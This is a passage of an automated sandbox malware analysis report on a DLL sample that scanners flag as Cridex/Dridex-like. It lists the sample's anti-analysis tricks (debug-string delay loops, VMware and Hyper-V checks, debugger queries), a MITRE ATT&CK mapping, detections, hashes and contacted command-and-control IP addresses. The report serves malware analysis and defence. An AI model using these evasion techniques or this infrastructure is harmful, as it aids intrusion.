Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion:

Tries to delay execution (extensive OutputDebugStringW loop)

Show sources

Source: C:\Windows\System32\loaddll32.exe

Section loaded: OutputDebugStringW count: 1109

Source: C:\Windows\System32\loaddll32.exe

Window / User API: threadDelayed 1108

Jump to behavior

Source: C:\Windows\System32\loaddll32.exe

Code function: 0_2_6E8F0730 GetTokenInformation,GetSystemInfo,GetTokenInformation,

0_2_6E8F0730

Source: Amcache.hve.6.dr	Binary or memory string: VMware
Source: Amcache.hve.6.dr	Binary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/5&1ec51bf7&0&000000
Source: WerFault.exe, 00000006.00000002.297434960.00000000052C0000.00000004.00000001.sdmp	Binary or memory string: Hyper-V RAWX
Source: Amcache.hve.6.dr	Binary or memory string: @scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/5&280b647&0&000000
Source: Amcache.hve.6.dr	Binary or memory string: VMware Virtual USB Mouse
Source: Amcache.hve.6.dr	Binary or memory string: VMware, Inc.
Source: Amcache.hve.6.dr	Binary or memory string: VMware Virtual disk SCSI Disk Devicehbin
Source: WerFault.exe, 00000006.00000003.295038548.00000000052FC000.00000004.00000001.sdmp, WerFault.exe, 00000006.00000002.297523050.00000000052FC000.00000004.00000001.sdmp	Binary or memory string: Hyper-V RAWr
Source: Amcache.hve.6.dr	Binary or memory string: Microsoft Hyper-V Generation Counter
Source: Amcache.hve.6.dr	Binary or memory string: VMware7,1
Source: Amcache.hve.6.dr	Binary or memory string: NECVMWar VMware SATA CD00
Source: Amcache.hve.6.dr	Binary or memory string: VMware Virtual disk SCSI Disk Device
Source: Amcache.hve.6.dr	Binary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW71.00V.13989454.B64.1906190538,BiosReleaseDate:06/19/2019,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware7,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
Source: WerFault.exe, 00000006.00000003.295038548.00000000052FC000.00000004.00000001.sdmp, WerFault.exe, 00000006.00000002.297523050.00000000052FC000.00000004.00000001.sdmp	Binary or memory string: Hyper-V RAW
Source: Amcache.hve.6.dr	Binary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
Source: Amcache.hve.6.dr	Binary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
Source: Amcache.hve.6.dr	Binary or memory string: VMware, Inc.me
Source: Amcache.hve.6.dr	Binary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/5&280b647&0&000000
Source: Amcache.hve.6.dr	Binary or memory string: VMware-42 35 44 6e 75 85 11 47-bd a2 bb ed 21 43 9f 89
Source: Amcache.hve.6.dr	Binary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/5&1ec51bf7&0&000000

Source: C:\Windows\SysWOW64\rundll32.exe	Process queried: DebugPort			Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process queried: DebugPort			Jump to behavior

Source: C:\Windows\System32\loaddll32.exe

Code function: 0_2_6E8E6D0C GetUserNameW,MessageBoxW,GetLastError,CreateFileA,DebugBreak,FlushFileBuffers,FreeEnvironmentStringsA,GetConsoleOutputCP,GetEnvironmentStrings,GetLocaleInfoA,GetStartupInfoA,GetStringTypeA,HeapValidate,IsBadReadPtr,LCMapStringA,LoadLibraryA,OutputDebugStringA,

0_2_6E8E6D0C

Source: C:\Windows\System32\loaddll32.exe

Code function: 0_2_6E8F3138 RtlAddVectoredExceptionHandler,

0_2_6E8F3138

Source: C:\Windows\SysWOW64\cmd.exe

Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.26365.dll",#1

Jump to behavior

Source: loaddll32.exe, 00000000.00000002.650434950.0000000001730000.00000002.00020000.sdmp, rundll32.exe, 00000002.00000000.260787768.0000000002E30000.00000002.00020000.sdmp, rundll32.exe, 00000002.00000000.257738056.0000000002E30000.00000002.00020000.sdmp	Binary or memory string: uProgram Manager
Source: loaddll32.exe, 00000000.00000002.650434950.0000000001730000.00000002.00020000.sdmp, rundll32.exe, 00000002.00000000.260787768.0000000002E30000.00000002.00020000.sdmp, rundll32.exe, 00000002.00000000.257738056.0000000002E30000.00000002.00020000.sdmp	Binary or memory string: Shell_TrayWnd
Source: loaddll32.exe, 00000000.00000002.650434950.0000000001730000.00000002.00020000.sdmp, rundll32.exe, 00000002.00000000.260787768.0000000002E30000.00000002.00020000.sdmp, rundll32.exe, 00000002.00000000.257738056.0000000002E30000.00000002.00020000.sdmp	Binary or memory string: Progman
Source: loaddll32.exe, 00000000.00000002.650434950.0000000001730000.00000002.00020000.sdmp, rundll32.exe, 00000002.00000000.260787768.0000000002E30000.00000002.00020000.sdmp, rundll32.exe, 00000002.00000000.257738056.0000000002E30000.00000002.00020000.sdmp	Binary or memory string: Progmanlock

Source: C:\Windows\System32\loaddll32.exe

Code function: GetUserNameW,MessageBoxW,GetLastError,CreateFileA,DebugBreak,FlushFileBuffers,FreeEnvironmentStringsA,GetConsoleOutputCP,GetEnvironmentStrings,GetLocaleInfoA,GetStartupInfoA,GetStringTypeA,HeapValidate,IsBadReadPtr,LCMapStringA,LoadLibraryA,OutputDebugStringA,

0_2_6E8E6D0C

Source: C:\Windows\System32\loaddll32.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Source: C:\Windows\System32\loaddll32.exe

0_2_6E8E6D0C

Source: Amcache.hve.6.dr

Binary or memory string: c:\program files\windows defender\msmpeng.exe

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts	Windows Management Instrumentation	Path Interception	Process Injection12	Virtualization/Sandbox Evasion11	OS Credential Dumping	Query Registry1	Remote Services	Archive Collected Data1	Exfiltration Over Other Network Medium	Encrypted Channel1	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	Modify System Partition
Default Accounts	Scheduled Task/Job	Boot or Logon Initialization Scripts	Boot or Logon Initialization Scripts	Process Injection12	LSASS Memory	Security Software Discovery31	Remote Desktop Protocol	Data from Removable Media	Exfiltration Over Bluetooth	Application Layer Protocol1	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	At (Linux)	Logon Script (Windows)	Logon Script (Windows)	Obfuscated Files or Information1	Security Account Manager	Virtualization/Sandbox Evasion11	SMB/Windows Admin Shares	Data from Network Shared Drive	Automated Exfiltration	Steganography	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	At (Windows)	Logon Script (Mac)	Logon Script (Mac)	Rundll321	NTDS	Process Discovery1	Distributed Component Object Model	Input Capture	Scheduled Transfer	Protocol Impersonation	SIM Card Swap		Carrier Billing Fraud
Cloud Accounts	Cron	Network Logon Script	Network Logon Script	Software Packing	LSA Secrets	Application Window Discovery1	SSH	Keylogging	Data Transfer Size Limits	Fallback Channels	Manipulate Device Communication		Manipulate App Store Rankings or Ratings
Replication Through Removable Media	Launchd	Rc.common	Rc.common	Steganography	Cached Domain Credentials	Account Discovery1	VNC	GUI Input Capture	Exfiltration Over C2 Channel	Multiband Communication	Jamming or Denial of Service		Abuse Accessibility Features
External Remote Services	Scheduled Task	Startup Items	Startup Items	Compile After Delivery	DCSync	System Owner/User Discovery1	Windows Remote Management	Web Portal Capture	Exfiltration Over Alternative Protocol	Commonly Used Port	Rogue Wi-Fi Access Points		Data Encrypted for Impact
Drive-by Compromise	Command and Scripting Interpreter	Scheduled Task/Job	Scheduled Task/Job	Indicator Removal from Tools	Proc Filesystem	Remote System Discovery1	Shared Webroot	Credential API Hooking	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Application Layer Protocol	Downgrade to Insecure Protocols		Generate Fraudulent Advertising Revenue
Exploit Public-Facing Application	PowerShell	At (Linux)	At (Linux)	Masquerading	/etc/passwd and /etc/shadow	System Information Discovery13	Software Deployment Tools	Data Staged	Exfiltration Over Asymmetric Encrypted Non-C2 Protocol	Web Protocols	Rogue Cellular Base Station		Data Destruction

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
SecuriteInfo.com.W32.AIDetect.malware1.26365.dll	21%	Virustotal		Browse
SecuriteInfo.com.W32.AIDetect.malware1.26365.dll	30%	ReversingLabs	Win32.Worm.Cridex

Dropped Files

No Antivirus matches

Unpacked PE Files

Source	Detection	Scanner	Label	Download
2.0.rundll32.exe.bf0000.1.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File
0.2.loaddll32.exe.6e8e0000.2.unpack	100%	Avira	HEUR/AGEN.1144420	Download File
2.0.rundll32.exe.6e8e0000.2.unpack	100%	Avira	HEUR/AGEN.1144420	Download File
2.0.rundll32.exe.bf0000.4.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File
2.2.rundll32.exe.bf0000.1.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File
2.0.rundll32.exe.6e8e0000.5.unpack	100%	Avira	HEUR/AGEN.1144420	Download File
0.2.loaddll32.exe.9e0000.0.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File
2.2.rundll32.exe.6e8e0000.2.unpack	100%	Avira	HEUR/AGEN.1144420	Download File

Domains

No Antivirus matches

URLs

Source	Detection	Scanner	Label	Link
http://www.n4pkg6fy8o.gaDVarFileInfo$	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

No contacted domains info

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://upx.sf.net	Amcache.hve.6.dr	false		high
http://www.n4pkg6fy8o.gaDVarFileInfo$	loaddll32.exe, 00000000.00000002.651068291.000000006E8FF000.00000002.00020000.sdmp, rundll32.exe, 00000002.00000000.261426287.000000006E8FF000.00000002.00020000.sdmp	false	Avira URL Cloud: safe	low

Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public

IP	Domain	Country	ASN	ASN Name	Malicious
185.4.135.27	unknown	Greece	199246	TOPHOSTGR	true
85.10.248.28	unknown	Germany	24940	HETZNER-ASDE	true
80.211.3.13	unknown	Italy	31034	ARUBA-ASNIT	true
144.91.122.102	unknown	Germany	51167	CONTABODE	true

Private

IP
192.168.2.1

General Information

Joe Sandbox Version:	34.0.0 Boulder Opal
Analysis ID:	544195
Start date:	22.12.2021
Start time:	20:34:08
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 7m 29s
Hypervisor based Inspection enabled:	false
Report type:	full
Sample file name:	SecuriteInfo.com.W32.AIDetect.malware1.26365.dll
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Run name:	Run with higher sleep bypass
Number of analysed new started processes analysed:	26
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled HDC enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal76.troj.evad.winDLL@6/6@0/5
EGA Information:	Failed
HDC Information:	Successful, ratio: 96.2% (good quality ratio 93.8%) Quality average: 79.4% Quality standard deviation: 25.7%
HCA Information:	Failed
Cookbook Comments:	Adjust boot time Enable AMSI Sleeps bigger than 120000ms are automatically reduced to 1000ms Found application associated with file extension: .dll
Warnings:	Show All Exclude process from analysis (whitelisted): MpCmdRun.exe, audiodg.exe, BackgroundTransferHost.exe, WerFault.exe, WMIADAP.exe, backgroundTaskHost.exe, SgrmBroker.exe, conhost.exe, svchost.exe, wuapihost.exe Excluded IPs from analysis (whitelisted): 131.253.33.200, 13.107.22.200, 20.42.65.92 Excluded domains from analysis (whitelisted): www.bing.com, client.wns.windows.com, fs.microsoft.com, arc.msn.com, ris.api.iris.microsoft.com, dual-a-0001.dc-msedge.net, onedsblobprdeus17.eastus.cloudapp.azure.com, a-0001.a-afdentry.net.trafficmanager.net, store-images.s-microsoft.com, www-bing-com.dual-a-0001.a-msedge.net, blobcollector.events.data.trafficmanager.net, displaycatalog.mp.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, watson.telemetry.microsoft.com Not all processes where analyzed, report is missing behavior information

Simulations

Behavior and APIs

No simulations

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Link
185.4.135.27	triage_dropped_file.dll	Get hash	malicious	Browse
	SecuriteInfo.com.BehavesLike.Win32.Drixed.hc.23689.dll	Get hash	malicious	Browse
	SecuriteInfo.com.W32.AIDetect.malware1.26365.dll	Get hash	malicious	Browse
	SecuriteInfo.com.W32.AIDetect.malware1.11362.dll	Get hash	malicious	Browse
	SecuriteInfo.com.W32.AIDetect.malware1.23460.dll	Get hash	malicious	Browse
	SecuriteInfo.com.W32.AIDetect.malware1.23460.dll	Get hash	malicious	Browse
	Positive_Result_75184731.xls	Get hash	malicious	Browse
	SecuriteInfo.com.W32.AIDetect.malware1.4295.dll	Get hash	malicious	Browse
	SecuriteInfo.com.W32.AIDetect.malware1.4295.dll	Get hash	malicious	Browse
	SecuriteInfo.com.W32.AIDetect.malware1.26189.dll	Get hash	malicious	Browse
	SecuriteInfo.com.ML.PE-A+Troj.Dridex-AJA.26363.dll	Get hash	malicious	Browse
	SecuriteInfo.com.W32.AIDetect.malware1.16860.dll	Get hash	malicious	Browse
	SecuriteInfo.com.W32.AIDetect.malware1.25234.dll	Get hash	malicious	Browse
	SecuriteInfo.com.W32.AIDetect.malware1.26189.dll	Get hash	malicious	Browse
	SecuriteInfo.com.ML.PE-A+Troj.Dridex-AJA.26363.dll	Get hash	malicious	Browse
	SecuriteInfo.com.W32.AIDetect.malware1.16860.dll	Get hash	malicious	Browse
	SecuriteInfo.com.W32.AIDetect.malware1.25234.dll	Get hash	malicious	Browse
	SecuriteInfo.com.W32.AIDetect.malware1.26959.dll	Get hash	malicious	Browse
	SecuriteInfo.com.W32.AIDetect.malware1.31779.dll	Get hash	malicious	Browse
	SecuriteInfo.com.W32.AIDetect.malware1.20482.dll	Get hash	malicious	Browse
85.10.248.28	triage_dropped_file.dll	Get hash	malicious	Browse
	SecuriteInfo.com.BehavesLike.Win32.Drixed.hc.23689.dll	Get hash	malicious	Browse
	SecuriteInfo.com.W32.AIDetect.malware1.26365.dll	Get hash	malicious	Browse
	SecuriteInfo.com.W32.AIDetect.malware1.11362.dll	Get hash	malicious	Browse
	SecuriteInfo.com.W32.AIDetect.malware1.23460.dll	Get hash	malicious	Browse
	SecuriteInfo.com.W32.AIDetect.malware1.23460.dll	Get hash	malicious	Browse
	Positive_Result_75184731.xls	Get hash	malicious	Browse
	SecuriteInfo.com.W32.AIDetect.malware1.4295.dll	Get hash	malicious	Browse
	SecuriteInfo.com.W32.AIDetect.malware1.4295.dll	Get hash	malicious	Browse
	SecuriteInfo.com.W32.AIDetect.malware1.26189.dll	Get hash	malicious	Browse
	SecuriteInfo.com.ML.PE-A+Troj.Dridex-AJA.26363.dll	Get hash	malicious	Browse
	SecuriteInfo.com.W32.AIDetect.malware1.16860.dll	Get hash	malicious	Browse
	SecuriteInfo.com.W32.AIDetect.malware1.25234.dll	Get hash	malicious	Browse
	SecuriteInfo.com.W32.AIDetect.malware1.26189.dll	Get hash	malicious	Browse
	SecuriteInfo.com.ML.PE-A+Troj.Dridex-AJA.26363.dll	Get hash	malicious	Browse
	SecuriteInfo.com.W32.AIDetect.malware1.16860.dll	Get hash	malicious	Browse
	SecuriteInfo.com.W32.AIDetect.malware1.25234.dll	Get hash	malicious	Browse
	SecuriteInfo.com.W32.AIDetect.malware1.26959.dll	Get hash	malicious	Browse
	SecuriteInfo.com.W32.AIDetect.malware1.31779.dll	Get hash	malicious	Browse
	SecuriteInfo.com.W32.AIDetect.malware1.20482.dll	Get hash	malicious	Browse

Domains

No context

ASN

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
TOPHOSTGR	triage_dropped_file.dll	Get hash	malicious	Browse	185.4.135.27
	SecuriteInfo.com.BehavesLike.Win32.Drixed.hc.23689.dll	Get hash	malicious	Browse	185.4.135.27
	SecuriteInfo.com.W32.AIDetect.malware1.26365.dll	Get hash	malicious	Browse	185.4.135.27
	SecuriteInfo.com.W32.AIDetect.malware1.11362.dll	Get hash	malicious	Browse	185.4.135.27
	SecuriteInfo.com.W32.AIDetect.malware1.23460.dll	Get hash	malicious	Browse	185.4.135.27
	SecuriteInfo.com.W32.AIDetect.malware1.23460.dll	Get hash	malicious	Browse	185.4.135.27
	Positive_Result_75184731.xls	Get hash	malicious	Browse	185.4.135.27
	SecuriteInfo.com.W32.AIDetect.malware1.4295.dll	Get hash	malicious	Browse	185.4.135.27
	SecuriteInfo.com.W32.AIDetect.malware1.4295.dll	Get hash	malicious	Browse	185.4.135.27
	SecuriteInfo.com.W32.AIDetect.malware1.26189.dll	Get hash	malicious	Browse	185.4.135.27
	SecuriteInfo.com.ML.PE-A+Troj.Dridex-AJA.26363.dll	Get hash	malicious	Browse	185.4.135.27
	SecuriteInfo.com.W32.AIDetect.malware1.16860.dll	Get hash	malicious	Browse	185.4.135.27
	SecuriteInfo.com.W32.AIDetect.malware1.25234.dll	Get hash	malicious	Browse	185.4.135.27
	SecuriteInfo.com.W32.AIDetect.malware1.26189.dll	Get hash	malicious	Browse	185.4.135.27
	SecuriteInfo.com.ML.PE-A+Troj.Dridex-AJA.26363.dll	Get hash	malicious	Browse	185.4.135.27
	SecuriteInfo.com.W32.AIDetect.malware1.16860.dll	Get hash	malicious	Browse	185.4.135.27
	SecuriteInfo.com.W32.AIDetect.malware1.25234.dll	Get hash	malicious	Browse	185.4.135.27
	SecuriteInfo.com.W32.AIDetect.malware1.26959.dll	Get hash	malicious	Browse	185.4.135.27
	SecuriteInfo.com.W32.AIDetect.malware1.31779.dll	Get hash	malicious	Browse	185.4.135.27
	SecuriteInfo.com.W32.AIDetect.malware1.20482.dll	Get hash	malicious	Browse	185.4.135.27
HETZNER-ASDE	triage_dropped_file.dll	Get hash	malicious	Browse	85.10.248.28
	SecuriteInfo.com.BehavesLike.Win32.Drixed.hc.23689.dll	Get hash	malicious	Browse	85.10.248.28
	SecuriteInfo.com.W32.AIDetect.malware1.26365.dll	Get hash	malicious	Browse	85.10.248.28
	SecuriteInfo.com.W32.AIDetect.malware1.11362.dll	Get hash	malicious	Browse	85.10.248.28
	SecuriteInfo.com.W32.AIDetect.malware1.23460.dll	Get hash	malicious	Browse	85.10.248.28
	UGDLmAm2UI.exe	Get hash	malicious	Browse	176.9.111.171
	SecuriteInfo.com.W32.AIDetect.malware1.23460.dll	Get hash	malicious	Browse	85.10.248.28
	Positive_Result_75184731.xls	Get hash	malicious	Browse	85.10.248.28
	SecuriteInfo.com.W32.AIDetect.malware1.4295.dll	Get hash	malicious	Browse	85.10.248.28
	SecuriteInfo.com.W32.AIDetect.malware1.4295.dll	Get hash	malicious	Browse	85.10.248.28
	tTy0oHh7FM.exe	Get hash	malicious	Browse	148.251.234.83
	ykTwsaBnqa.exe	Get hash	malicious	Browse	144.76.84.177
	SecuriteInfo.com.W32.AIDetect.malware1.26189.dll	Get hash	malicious	Browse	85.10.248.28
	SecuriteInfo.com.ML.PE-A+Troj.Dridex-AJA.26363.dll	Get hash	malicious	Browse	85.10.248.28
	SecuriteInfo.com.W32.AIDetect.malware1.16860.dll	Get hash	malicious	Browse	85.10.248.28
	SecuriteInfo.com.W32.AIDetect.malware1.25234.dll	Get hash	malicious	Browse	85.10.248.28
	SecuriteInfo.com.W32.AIDetect.malware1.26189.dll	Get hash	malicious	Browse	85.10.248.28
	SecuriteInfo.com.ML.PE-A+Troj.Dridex-AJA.26363.dll	Get hash	malicious	Browse	85.10.248.28
	SecuriteInfo.com.W32.AIDetect.malware1.16860.dll	Get hash	malicious	Browse	85.10.248.28
	SecuriteInfo.com.W32.AIDetect.malware1.25234.dll	Get hash	malicious	Browse	85.10.248.28

JA3 Fingerprints

No context

Dropped Files

No context

Created / dropped Files

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_rundll32.exe_fbb2d8caa9bc88c88f59a4bf7aec3c671b51a1_82810a17_1965b519\Report.wer Download File
Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Little-endian UTF-16 Unicode text, with CRLF line terminators
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	0.922228052588535
Encrypted:	false
SSDEEP:	192:OniZ0oX/m/HBUZMX4jed+fg/u7sLS274ItWc:+iXX/m/BUZMX4jeKg/u7sLX4ItWc
MD5:	7B2FCCD1269B871F48C2837AE8206D2C
SHA1:	6A4C5595B94C7630832832A2BABDFABF026DB1C6
SHA-256:	18FCC8BD0694B5F5264DFF66888B0F332D8A28ACC3FA09AC17ED47FDF7CC51AF
SHA-512:	B8E7D60976D92F71A4704445A8435F2EAC68635F4828ECBFC1C99002B42E82EE1C8794C3A1B19F4610D29005EBC6FC62FA4E3CC8C08C3144383585377A54901A
Malicious:	false
Reputation:	low
Preview:	..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.2.8.4.7.0.7.7.1.6.0.7.8.0.4.0.3.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.2.8.4.7.0.7.7.2.7.0.7.7.9.9.6.2.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.6.9.6.9.e.a.c.8.-.b.c.c.e.-.4.f.b.0.-.a.e.9.a.-.e.4.7.d.e.8.f.a.5.5.a.0.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.e.4.8.4.2.4.f.2.-.4.d.d.8.-.4.1.0.9.-.b.1.a.0.-.b.d.7.b.e.a.5.5.0.b.9.9.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.r.u.n.d.l.l.3.2...e.x.e.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.R.U.N.D.L.L.3.2...E.X.E.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.0.f.c.8.-.0.0.0.1.-.0.0.1.7.-.6.1.4.0.-.2.b.7.7.b.6.f.7.d.7.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.0.f.5.1.9.f.e.e.c.4.8.6.d.e.8.7.e.d.7.3.c.b.9.2.d.3.c.a.c.8.0.2.4.0.0.0.0.0.0.0.0.!.0.0.0.0.b.c.c.5.d.c.3.2.2.2.0.3.4.d.3.f.2.5.7.f.1.f.d.3.5.8.8.9.e.5.b.e.9.0.f.0.9.

C:\ProgramData\Microsoft\Windows\WER\Temp\WER83A9.tmp.dmp Download File
Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Mini DuMP crash report, 14 streams, Thu Dec 23 04:35:17 2021, 0x1205a4 type
Category:	dropped
Size (bytes):	45384
Entropy (8bit):	2.0794687281612982
Encrypted:	false
SSDEEP:	192:Qpbd0XyfsKVyryriO5SkbmQ0ZS1rH30Oz91hnUt:QfswR5Lbp0ZC30OzdU
MD5:	CABA141EA7EF4E72D7F2FBB3017FDB02
SHA1:	1741771DF6476310C1456DE7057A988006595D2C
SHA-256:	DE1CA9C831F007AF46900FBA510EC9DA14A78DE70ED34528F7A9E7BC46E3E292
SHA-512:	2461A7CCA91C3BDEC7B6ECD40C5767B2325123C3EB49BB2D0AB4865D951501A76129324CC20E00E4213E2578B372A6F9B89F2FEB6EEDCCA7391F831018C883FA
Malicious:	false
Reputation:	low
Preview:	MDMP....... ..........a.........................................-..........T.......8...........T...........@................................................................................................U...........B...... .......GenuineIntelW...........T...........\|..a.............................0..=...............P.a.c.i.f.i.c. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................P.a.c.i.f.i.c. .D.a.y.l.i.g.h.t. .T.i.m.e...........................................1.7.1.3.4...1...x.8.6.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.....................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\Microsoft\Windows\WER\Temp\WER8BA8.tmp.WERInternalMetadata.xml Download File
Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, Little-endian UTF-16 Unicode text, with CRLF line terminators
Category:	dropped
Size (bytes):	8326
Entropy (8bit):	3.6935950589114603
Encrypted:	false
SSDEEP:	192:Rrl7r3GLNi9t67OgBP6Yd062gmfT/vSCCprn89bCIsfE2m:RrlsNiX6r6Yu62gmfT/vSCC7fM
MD5:	D77CAECE28BAFD5FBC85F37028055A1F
SHA1:	3125FE6D1AA3B9D485AD7380D892CA80E4FA6432
SHA-256:	83BFE888BD9BEB40089C6646C8D65F641B7F82D19818EBD1320D8CD050C139BD
SHA-512:	6B23F7BD21D2769608338B8E10EBEDD25AA4C3A478E50F3779996A6EC62F79B6B05EE562F600F1FE7C997269D1ED85D2295572E22931AD227A1525997F1B3B69
Malicious:	false
Reputation:	low
Preview:	..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.7.1.3.4.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.7.1.3.4...1...a.m.d.6.4.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.1.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. 